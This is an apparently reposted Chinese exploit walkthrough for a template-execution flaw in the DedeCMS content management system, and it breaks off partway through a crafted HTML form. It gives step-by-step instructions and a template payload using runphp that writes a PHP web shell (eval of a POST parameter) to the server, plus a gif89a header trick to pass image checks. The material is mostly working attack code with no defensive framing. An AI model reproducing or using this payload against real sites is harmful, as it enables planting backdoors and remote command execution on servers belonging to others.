DEDECMS网站管理系统模板执行漏洞(2)

注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是: 

 

uploads/userup/2/12OMX04-15A.jpg

 

模板内容是(如果限制图片格式,加gif89a): 

{dede:name runphp='yes'}

$fp = @fopen("1.php", 'a');

@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");

@fclose($fp);

{/dede:name}

 

2.修改刚刚发表的文章,查看源文件,构造一个表单: 

 

<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent"

action="" method="post" enctype="multipart/form-data" onsubmit="return checkSubmit();">

<input type="hidden" name="dopost" value="save" />

<input type="hidden" name="aid" value="2" />

<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />

<input type="hidden" name="channelid" value="1" />

<input type="hidden" name="oldlitpic" value="" />

<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">

<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">

<label>标题:</label>

<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/eb37964e579cf8dcf0002e1eeb3c3131.html